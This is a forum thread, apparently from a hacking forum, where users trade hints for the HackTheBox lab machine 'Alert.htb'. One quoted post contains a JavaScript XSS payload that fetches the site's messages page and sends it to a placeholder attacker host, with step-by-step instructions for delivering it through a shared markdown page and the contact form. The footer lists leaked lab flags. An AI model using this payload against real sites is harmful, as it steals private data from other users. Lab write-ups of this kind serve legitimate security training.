Alert.htb
by X_P_L_0_1_D - Saturday November 23, 2024 at 04:50 PM
#31
(Nov 25, 2024, 01:42 AM)grisun0 Wrote: one command to user Tongue



(Nov 24, 2024, 07:25 PM)xxoro Wrote:
(Nov 23, 2024, 09:01 PM)darknesst Wrote: create a md page that reads alert.htb then sends it to your localhost upload it and then click share in the bottom right. then in the contact page send them <img src="shared md page" /> you should get response of the homepage which you can see a messages page and can access that via the same method

<script>
  fetch("http://alert.htb/index.php?page=messages")
    .then(response => response.text()) // Convert the response to text
    .then(data => {     
      fetch("http://<your host>/?data=" + encodeURIComponent(data));
    })
    .catch(error => console.error("Error fetching the messages:", error));
</script>



got a *.txt file, it's empty, i am missing something!!

Hey buddy, after creating your md file and hitting the share button, send a message through contacts by pasting the link to the shared md without the img tag, just the link, and it worked for me!

Thanks for the help, I knew I was missing a step!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 94 8,622 5 hours ago
Last Post: d39ug
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 26 2,585 6 hours ago
Last Post: d39ug
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 37 3,208 6 hours ago
Last Post: xosec
  CBBH Write Ups hiddenhacker 26 6,657 6 hours ago
Last Post: d39ug
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 606 94,380 7 hours ago
Last Post: Gotoschool

Forum Jump:


 Users browsing this forum: 1 Guest(s)